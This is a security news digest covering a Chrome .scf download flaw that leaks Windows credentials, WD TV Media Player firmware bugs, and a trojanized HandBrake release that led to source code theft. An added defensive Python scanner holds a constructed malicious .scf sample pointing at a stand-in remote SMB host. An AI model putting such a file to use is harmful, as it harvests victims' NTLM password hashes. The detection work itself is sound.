- Google Chrome Bug Leads to Windows Credential Theft
A bug in Google’s popular web browser Chrome could enable bad actors to place a malicious file onto a target PC that could then be used to siphon off Windows credentials and initiate a Server Message Block (SMB) relay attack, according to a post by Bosko Stankovic, an information security engineer at DefenseCode. He discovered the vulnerability in the default configuration of Chrome on all Windows versions that support the browser. In its default configuration, Chrome automatically downloads files that it deems safe without prompting the user for a download location. The issue stems from the Windows Explorer Shell Command File (SCF, .scf): a text file that launches commands, requires no user action, and can be used to trick Windows into an authentication attempt against a remote SMB server, which then gathers the victim’s username and Microsoft LAN Manager (NTLMv2) password hash.
Cyber Security Tips: Users are strongly recommended to disable automatic downloads in Google Chrome: Settings -> Show advanced settings -> check the "Ask where to save each file before downloading" option.
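As an added defensive example that is not part of the original article, the following Python script checks a downloads folder for .scf files whose fields point at a remote UNC host, which is the condition that would trigger the SMB authentication attempt described above. The sample files, the temporary folder and the 192.0.2.10 host address are constructed for the demonstration.

```python
import re
import tempfile
from pathlib import Path

# A UNC path (\\host\share\...) in any field is what makes Explorer contact that
# host, sending an NTLM authentication attempt, when the folder is rendered.
UNC_RE = re.compile(r"^\\\\([^\\]+)\\")
LOCAL_HOSTS = {"localhost", "127.0.0.1", "::1"}

def scf_remote_targets(text):
    """Return [(field, host), ...] for every INI-style value that is a UNC
    path to a host other than the local machine."""
    hits = []
    for line in text.splitlines():
        key, sep, value = line.partition("=")
        if not sep:
            continue  # section header or blank line
        m = UNC_RE.match(value.strip())
        if m and m.group(1).lower() not in LOCAL_HOSTS:
            hits.append((key.strip(), m.group(1)))
    return hits

def scan_downloads(folder):
    """Map each .scf file under folder to the remote UNC targets it references."""
    findings = {}
    for path in Path(folder).rglob("*.scf"):
        try:
            hits = scf_remote_targets(path.read_text(errors="replace"))
        except OSError:
            continue
        if hits:
            findings[path.name] = hits
    return findings

# Constructed samples: a benign .scf pointing at a local resource and a
# suspicious one whose icon is fetched from a remote (documentation-range) host.
BENIGN_SCF = "[Shell]\nCommand=2\nIconFile=explorer.exe,3\n[Taskbar]\nCommand=ToggleDesktop\n"
SUSPICIOUS_SCF = "[Shell]\nCommand=2\nIconFile=\\\\192.0.2.10\\share\\icon.ico\n"

def demo():
    """Write both samples into a temporary 'Downloads' folder and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        Path(tmp, "Show Desktop.scf").write_text(BENIGN_SCF)
        Path(tmp, "invoice.scf").write_text(SUSPICIOUS_SCF)
        return scan_downloads(tmp)

if __name__ == "__main__":
    for name, targets in demo().items():
        print(f"{name}: remote UNC targets {targets}")
```

Pointing scan_downloads at a real Chrome download directory flags any auto-downloaded .scf file before the folder is opened in Explorer.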
- Researchers Disclose Unpatched WD TV Media Player Flaws
WD TV Media Player is a device that you can connect to a smart TV to play content stored on a network-attached storage (NAS) device, a USB thumb drive or a local PC, or to stream content from the Internet. Security researchers from SEC Consult have found eight vulnerabilities in the firmware of the Western Digital TV Media Player that give attackers multiple ways to compromise and take over the device. The vulnerabilities are Unauthenticated Arbitrary File Upload, Local File Inclusion (LFI), Cross Site Request Forgery (CSRF), Private Key Embedded in Firmware, SQL Injection on SQLite Database, Webserver Running with Root Privileges, Login Not Protected Against Brute-Force Attacks and Full Path Disclosure. According to the researchers, these vulnerabilities range from SQL injection to CSRF bugs and allow attackers to upload rogue (backdoored) files to the device’s built-in web server, execute code against the device’s firmware, compromise its local SQLite database, and decrypt and steal user data.
Cyber Security Tips: The company is still working on the issue; as a temporary mitigation, users should take these devices offline until a fixed firmware version becomes available.
- Code Stolen After Developer Installed Trojanized App
In a perfect example of how a breach can have an unexpected impact, application builder Panic announced on Wednesday that it had suffered source code theft after a developer unknowingly installed a Trojanized application in early May. HandBrake is a tool for converting video from nearly any format to a selection of modern, widely supported codecs. Panic Inc. developer and co-founder Steven Frank said he downloaded the infected version of HandBrake, which led to the theft of much of the source code behind Panic’s apps. Panic offers several apps, including the web editor Coda, the FTP app Transmit, the SSH client Prompt, and Firewatch, an adventure game. The attackers accessed Frank’s computer through the infected HandBrake software and were able to obtain his usernames and passwords, including git credentials. HandBrake posted a security alert on its website informing users that those who downloaded the application between May 2 and May 6 might have been infected. Only the download mirror at download.handbrake.fr had been compromised, but all users were advised to verify their installation.
Cyber Security Tips: Users who installed the application between May 2 and May 6 are recommended to verify their installation or uninstall it, to install applications only from trusted sources, and to keep a reputable, up-to-date antivirus installed.